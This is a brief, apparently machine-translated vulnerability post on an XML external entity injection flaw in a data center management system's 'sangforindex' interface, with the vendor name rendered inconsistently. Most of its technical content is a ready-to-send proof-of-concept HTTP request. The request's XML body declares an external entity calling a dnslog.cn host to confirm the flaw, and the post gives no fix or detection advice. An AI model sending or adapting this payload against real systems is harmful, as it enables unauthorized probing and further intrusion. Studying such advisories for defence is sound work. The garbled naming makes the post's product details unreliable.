Deepin Service Dc Data Center Management System Sangforindex Xml Entity Injection Vulnerability
Deepin Service Dc Data Center Management System Sangforindex Xml Entity Injection Vulnerability
#Shenxinshui DC Data Center Management System sangforindex XML Entity Injection Vulnerability
Vulnerability Description
Deepin Service DC Data Center Management System sangforindex interface has an XML entity injection vulnerability, and an attacker can send a specific request packet to cause XML entity injection.
Vulnerability Impact
Shenxinshui DC Data Center Management System
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
POST /src/sangforindex HTTP/1.1
Host:
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE root [
<!ENTITY rootas SYSTEM "https://xgsg1k.dnslog.cn">
]>
<xxx>
&rootas;
</xxx>
This post is licensed under CC BY 4.0 by the author.